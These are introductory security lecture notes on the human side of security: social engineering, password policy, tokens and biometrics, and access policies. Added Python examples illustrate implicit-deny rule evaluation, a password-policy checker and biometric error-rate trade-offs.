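The IMPLICIT DENY slide above states the principle and names its alternative ("allow access unless a specific rule forbids it") without showing where the two diverge. The script below is an added example for this page, not code from the deck: a first-match rule engine of the kind firewalls and ACLs use, evaluated once with a default of deny and once with a default of allow. The rule format, the rules, the addresses and the request list are constructed for illustration.

```python
"""Implicit deny versus "allow unless forbidden" in a first-match rule set of
the kind firewalls and ACLs use. Added example; the rule format, the rules and
the requests are constructed for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    src: str                 # source network in CIDR form
    port: Optional[int]      # destination port; None matches any port

    def matches(self, src_ip: str, port: int) -> bool:
        return (ip_address(src_ip) in ip_network(self.src)
                and (self.port is None or self.port == port))


# Constructed rule set. Order matters with first-match evaluation: the
# quarantine deny must come before the broad internal allow, otherwise a
# quarantined host would be let through to 443 by the second rule.
RULES = [
    Rule("deny", "10.0.9.0/24", None),    # quarantined subnet: nothing at all
    Rule("allow", "10.0.0.0/8", 443),     # any internal client to HTTPS
    Rule("allow", "10.0.5.0/24", 22),     # admin subnet to SSH
]


def decide(rules, src_ip: str, port: int, default: str = "deny") -> str:
    """First matching rule wins. When no rule matches, `default` applies:
    'deny' is implicit deny; 'allow' is the alternative the slide mentions,
    where access is granted unless a rule specifically forbids it."""
    for rule in rules:
        if rule.matches(src_ip, port):
            return rule.action
    return default


def compare_policies(requests, rules=RULES):
    """Evaluate each (src_ip, port) under both defaults. Returns
    {(src_ip, port): (implicit_deny_result, default_allow_result)}. The two
    columns differ exactly on the requests nobody wrote a rule for."""
    return {(ip, port): (decide(rules, ip, port, "deny"),
                         decide(rules, ip, port, "allow"))
            for ip, port in requests}


SAMPLE_REQUESTS = [
    ("10.0.5.7", 22),        # admin to SSH: explicitly allowed
    ("10.0.9.3", 443),       # quarantined host: explicitly denied first
    ("10.0.7.20", 3389),     # internal host to RDP: no rule at all
    ("203.0.113.5", 443),    # external host to HTTPS: no rule at all
]

if __name__ == "__main__":
    for (ip, port), (implicit_deny, default_allow) in compare_policies(SAMPLE_REQUESTS).items():
        print(f"{ip:>12}:{port:<5} implicit-deny={implicit_deny:5}  default-allow={default_allow}")
```

The last two requests are the point of the slide: nobody wrote a rule for RDP from the office or for HTTPS from the Internet, and under implicit deny that omission fails closed, while under the alternative it fails open. The comment on rule order is the companion lesson: an explicit deny only protects you if it is evaluated before the broader allow that would otherwise match.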
USERS == PEOPLE: A SECURITY PROBLEM

USERS
• Users
• Groups
• Authentication
• Access control

SOCIAL ENGINEERING
• The process of convincing an individual to provide confidential information or access to an unauthorized individual
• One of the most successful methods attackers have used to gain access to computer systems and networks
• The technique relies on an aspect of security that is easily overlooked: people
• Most people have an inherent desire to be helpful or to avoid confrontation; social engineers exploit this
• Social engineers gather seemingly useless bits of information that, put together, divulge other sensitive information ("data aggregation")
• The attacker uses deceptive practices to convince someone to divulge information they normally would not divulge, or to do something they normally wouldn't do
• Seemingly innocuous information can be used directly in an attack, or indirectly to build a bigger picture and create an aura of authenticity during an attack
• Indirect methods: phishing, vishing

SECURITY HOAXES
• Hoaxes designed to elicit a user reaction: delete a file, change a setting, spread the word
• Defense: training and awareness

POOR SECURITY PRACTICES
• Users create security problems via poor practices: writing secrets down, poor password selection, piggybacking, dumpster diving, installing unauthorized hardware/software

PIGGYBACKING
• Following closely behind a person who has just used their own access card to gain physical access to a room or building
• Relies on the attacker taking advantage of an authorized user not following security procedures, e.g.,
an employee returning from a smoking area.
• Countered by:
• Training and awareness
• Guards
• Man trap or turnstile
DUMPSTER DIVING
• The process of going through a target's trash.
• Not unique to the computer community: identity thieves, private investigators and law enforcement personnel all use it.
• Countermeasures:
• Shred sensitive information before discarding it, personal as well as corporate.
• Secure the trash receptacle.
INSTALLING UNAUTHORIZED HARDWARE AND SOFTWARE
• Policy that restricts users from installing software and new hardware on their systems.
• Common examples:
• Unauthorized communication software to connect from home.
• Installing a wireless access point.
• Installing games.
• Such installations create a backdoor that circumvents all the other security mechanisms in place.
INSTALLING UNAUTHORIZED HARDWARE AND SOFTWARE
• Many organizations:
• Do not allow their users to load software or install new hardware without authorization.
• Screen, and occasionally intercept, e-mail messages with links or attachments that are sent to users. This helps prevent users from unwittingly executing malware.
• Have their mail servers strip executable attachments from e-mail so that users cannot accidentally cause a security problem.
PHYSICAL ACCESS BY NON-EMPLOYEES
• Non-employees with a legitimate reason to be in the facility can reach computer systems and networks, and staff become complacent about their presence.
• Consider also personnel who have legitimate access but intend to steal intellectual property.
• Either provides the opportunity to look for critical information carelessly left out.
• With the proliferation of devices such as cell phones with built-in cameras, such information can simply be photographed.
PEOPLE AS A SECURITY TOOL
• People can be an effective security mechanism.
• Policies and procedures
• Training and awareness
• Many eyes:
• Challenge visitors
• Report abnormal conditions
• Make everyone responsible and involved.
SECURITY AWARENESS
• An active security awareness program will vary depending on:
• The organization's environment
• The level of threat
• Initial employee training on social engineering, as well as periodic refresher training.
• Clean desk policy
• Screen savers that lock the screen after a short idle time
INDIVIDUAL USER RESPONSIBILITIES
1. Lock doors.
2. Keep no sensitive information in your car.
3. Secure storage media containing sensitive information.
4. Shred sensitive documents before discarding them.
5. Do not divulge sensitive information to individuals not authorized to know it.
6. Do not discuss sensitive information with family members.
AUTHENTICATION VS ACCESS CONTROL
• Authentication:
• Verifies the identity of a subject.
• The process by which a user proves that she is who she says she is.
• Access control:
• Governs the ability of a subject (an individual or a process running on a computer system) to interact with an object (a file or hardware device).
• The goal is to allow access to authorized users and to make sure access is denied to unauthorized people.
AUTHENTICATION
• Three types (factors) of authentication:
• Something you know (password): still the most used method.
• Something you have (token or card).
• Something you are (biometric).
• Plus behavior, how you do something: how you type, talk or walk.
PASSWORD SELECTION
• Users tend to pick passwords that are easy for them to remember:
• Dates
• Names
• Appending 1, 2, 3 on each change: Mary1, Mary2, Mary3
• If it is easy for the user to remember, then the more you know about the user, the better your chance of guessing their password.
PASSWORD SELECTION
• The rules for good password selection in general:
• 16+ characters
• A combination of upper- and lowercase letters
• At least one number
• At least one special character
• Do not use a common word, phrase or name.
• Choose a password that you can remember so that you do not need to write it down.
• Don't use common phrases, songs, poems or speeches that you know by heart, or even the first letters of their words.
• Don't write it down.
PASSWORD SELECTION
• Phrase method: use the first letter of each word in a phrase.
• "Jack be nimble, Jack be quick, Jack jumped over the candlestick" becomes Jbnjbqjj0tcs!
• But that phrase is known; use a private one:
• "This is the first day I teach in Brazil - hope it goes well" becomes tIt1dit1Bzhigzw3L
• If the result is too complex to remember, the user will write it down, which defeats the purpose.
PASSWORD POLICY COMPONENTS
• Password construction
• Reuse restrictions
• Password history
• Minimum expiration
• Maximum expiration
• Duration
• Protection of passwords
• Consequences
PASSWORD POLICY OPTIONS
DOMAIN PASSWORD POLICY ELEMENTS
• Enforce password history
• Maximum password age
• Minimum password age
• Minimum password length
• Password must meet complexity requirements
• Do not store passwords using reversible encryption
TOKENS
• "Something you have."
• A physical object that identifies specific access rights:
• Smart card
• USB key
• RFID
• Drawbacks:
• It is the token that is authenticated, not the person: theft of the token could grant anyone who possesses it access to whatever the system protects.
• Users forget or lose it.
BIOMETRICS
• Biometrics use measurements of certain biological factors to distinguish one specific person from others. These factors are based on parts of the human body that are unique; the best known is the fingerprint.
• False positives and false negatives are the two issues with biometric scanners.
FALSE POSITIVES
• A false positive occurs when a biometric is scanned and access is granted to someone who is not authorized. For example, two people who have very similar fingerprints might be recognized as the same person by the computer, which then grants access to the wrong person.
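The construction rules from the PASSWORD SELECTION slides and the history and age elements from DOMAIN PASSWORD POLICY ELEMENTS above, implemented as an added example checker (not code from the slides). The policy thresholds, the short common-word list, the salted PBKDF2 hashing of history entries and the example dates are assumptions.

```python
"""Password policy checker for the construction, history and age rules on
the PASSWORD SELECTION and DOMAIN PASSWORD POLICY ELEMENTS slides.

Added example, not code from the slides.  Policy values, the common-word
list, the PBKDF2 hashing of stored history and the dates are assumptions.
"""
import hashlib
import hmac
import os
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

MIN_LENGTH = 16                 # "16+ characters"
HISTORY_SIZE = 24               # "enforce password history" (assumed depth)
MIN_AGE = timedelta(days=1)     # "minimum password age" (assumed)
MAX_AGE = timedelta(days=90)    # "maximum password age" (assumed)
# Constructed stand-in for a real dictionary of common words and names.
COMMON_WORDS = {"password", "welcome", "qwerty", "letmein", "mary", "summer"}


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2 digest, so history can be checked without keeping old
    passwords in reversible form ("do not store using reversible encryption")."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest


def construction_errors(password: str) -> List[str]:
    """Return the construction rules a candidate password violates."""
    errors = []
    if len(password) < MIN_LENGTH:
        errors.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.islower() for c in password):
        errors.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        errors.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
        errors.append("no digit")
    if all(c.isalnum() for c in password):
        errors.append("no special character")
    # Strip the digits and punctuation users bolt on (Mary1, Mary2, Mary3)
    # before comparing against the common-word list.
    core = "".join(c for c in password if c.isalpha()).lower()
    if core in COMMON_WORDS:
        errors.append("based on a common word or name")
    return errors


def check_change(password: str, history: List[Tuple[bytes, bytes]],
                 last_changed: datetime, now: datetime) -> List[str]:
    """Full policy on a password change: construction + reuse + minimum age."""
    errors = construction_errors(password)
    if now - last_changed < MIN_AGE:
        errors.append("changed too recently (minimum password age)")
    for salt, digest in history[-HISTORY_SIZE:]:
        if hmac.compare_digest(hash_password(password, salt)[1], digest):
            errors.append("reused a password from the history")
            break
    return errors


def is_expired(last_changed: datetime, now: datetime) -> bool:
    """Maximum password age: once True the user must pick a new password."""
    return now - last_changed > MAX_AGE


def demo_results():
    """Evaluate four constructed candidates against a one-entry history."""
    now = datetime(2024, 1, 10)
    history = [hash_password("tIt1dit1Bzhigzw3L")]       # previous password on file
    cases = {
        "Mary3": datetime(2024, 1, 9, 12),                 # weak, and changed 12h ago
        "tIt1dit1Bzhigzw3L": datetime(2024, 1, 1),         # reuse of the stored one
        "Jbnjbqjj0tcs!": datetime(2024, 1, 1),             # the slides' known phrase
        "Vz7!granite-Kettle-orbit": datetime(2024, 1, 1),  # passes every rule
    }
    verdicts = {pw: check_change(pw, history, changed, now)
                for pw, changed in cases.items()}
    return verdicts, is_expired(datetime(2023, 9, 1), now)


if __name__ == "__main__":
    verdicts, expired = demo_results()
    for pw, errors in verdicts.items():
        print(f"{pw!r}: {errors or 'OK'}")
    print("password set 2023-09-01 expired:", expired)
```

Run as a script it prints a verdict for each candidate. Two results are worth noticing: the slides' own private-phrase example, tIt1dit1Bzhigzw3L, fails the special-character rule it is meant to illustrate, and Mary3 fails several rules at once. A checker like this surfaces such inconsistencies before a policy is published rather than after users have memorized a password it will reject.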
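The false positive / false negative trade-off as an added example (not from the slides): a threshold sweep over constructed match scores that computes the false accept rate (false positives) and false reject rate (false negatives), and finds the threshold at which the two cross. The scores and the 0 to 100 scale are assumptions standing in for a real scanner's similarity output.

```python
"""False positives versus false negatives in a biometric matcher as the
decision threshold moves.

Added example, not from the slides.  Match scores are constructed (0 = no
resemblance, 100 = identical) to stand in for a scanner's similarity output.
"""

# Constructed similarity scores.
# GENUINE: the enrolled person scanned again (should be accepted).  The low
# values model cases like the hand-geometry user without his usual ring.
# IMPOSTOR: a different person (should be rejected).  The high values model
# "very similar fingerprints".
GENUINE = [92, 88, 95, 81, 77, 90, 85, 70, 93, 86, 74, 89]
IMPOSTOR = [12, 25, 33, 41, 18, 57, 29, 63, 22, 36, 48, 71]


def rates(threshold, genuine=GENUINE, impostor=IMPOSTOR):
    """(FAR, FRR) for the rule "accept if score >= threshold".

    FAR, false accept rate = false positives: impostors let in.
    FRR, false reject rate = false negatives: legitimate users locked out.
    """
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr


def sweep(thresholds=range(0, 101, 10)):
    """Map threshold -> (FAR, FRR); raising the threshold trades false
    positives for false negatives."""
    return {t: rates(t) for t in thresholds}


def equal_error_threshold(thresholds=range(0, 101)):
    """Threshold where FAR and FRR are closest (the equal error rate point),
    the usual starting point before a site biases toward one failure mode."""
    return min(thresholds, key=lambda t: abs(rates(t)[0] - rates(t)[1]))


if __name__ == "__main__":
    print("threshold   FAR (false pos)   FRR (false neg)")
    for t, (far, frr) in sweep().items():
        print(f"{t:>9}   {far:>15.3f}   {frr:>15.3f}")
    t = equal_error_threshold()
    print(f"equal error threshold: {t}  (FAR={rates(t)[0]:.3f}, FRR={rates(t)[1]:.3f})")
```

A door to a server room is normally tuned to the left of the crossover (fewer false accepts, more annoyed employees); a phone unlock to the right. Which way to bias is a policy decision, and the table makes the cost of each choice visible.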
FALSE NEGATIVES
• A false negative occurs when the system denies access to someone who is actually authorized. For example, a user at a hand geometry scanner forgot to wear a ring he usually wears; the computer does not recognize his hand and denies him access.
MULTIPLE-FACTOR AUTHENTICATION
• A combination of two or more types of authentication:
• What you are (for example, biometrics)
• What you have (for instance, tokens)
• What you know (passwords and other information)
• Plus how you do it (behavior)
• The factors must be of different types; two passwords are still a single factor.
SECURITY POLICIES & PROCEDURES
• Policy: high-level statements created by management that lay out the organization's position on particular issues.
• Security policy: a high-level statement that outlines both what security means to the organization and the organization's goals for security.
• Procedure: step-by-step instructions that dictate exactly how employees are expected to act in a given situation or to accomplish a specific task.
ACCEPTABLE USE POLICY
• Outlines the behaviors that are considered appropriate when using a company's resources.
• Internet use policy: where employees may browse.
• E-mail usage policy: whether non-work e-mail traffic is allowed at all, or is severely restricted.
SINGLE SIGN-ON
• Single sign-on (SSO) is an authentication process in which the user enters a single username and password and can then move from application to application or resource to resource without supplying further authentication information.
SINGLE SIGN-ON
• Reduces login hassles:
• Fewer usernames and passwords to remember.
• Quick access in emergencies, such as in healthcare.
• Inherently less secure:
• If the login for one system is compromised, every system the user can reach through it is compromised too.
POLICIES AND PROCEDURES
• Physical security policies and procedures relate to two distinct areas:
• Those that affect the computers themselves
• Those that affect users
COMPUTER POLICIES
• Remove or disable the floppy disk drive.
• Remove or disable the optical drive.
• If that is not possible, remove the device from the boot menu and set a BIOS password.
• Disallow USB drive keys, through Active Directory (Group Policy) or registry settings.
• If that is not possible, implement aggressive anti-malware scanning.
COMPUTER POLICIES
• Lock up or encrypt equipment that contains sensitive data.
• Train all employees:
• To challenge strangers
• To follow procedures
• To lock workstations before leaving them
PHYSICAL BARRIERS
• Principle of layered security:
• Fences
• Guard at the gate
• Open space
• Walls
• Signs denoting public and private areas
• Man trap
BEING PREPARED
• Disaster recovery
• Business continuity
• Backups
• Alternate sites
• Power sources
• Spare parts
• Plans
• Policies
PRIVACY
• A privacy policy should be completed detailing how information is safeguarded.
• Privacy is enforced by law for some organizations.
• Personally Identifiable Information (PII) is becoming increasingly important to safeguard.
HUMAN RESOURCES POLICIES
• People are the weakest link in security.
• Specific policies should be developed regarding:
• New-hire screening processes
• Periodic review process for current employees
• Employee termination process
• Mandatory vacation to uncover wrongdoing
CODE OF ETHICS
• Describes expected behavior from a high-level standpoint.
• Sets the tone for employee conduct.
• Encourages integrity and high ethical standards.
SECURE DEVELOPMENT LIFECYCLE
• Firms have recognized the need for secure code.
• Security should be addressed throughout the development process, not bolted on at the end.
• The SDL accounts for security in each of its four major phases:
• Requirements phase
• Design phase
• Coding phase
• Testing phase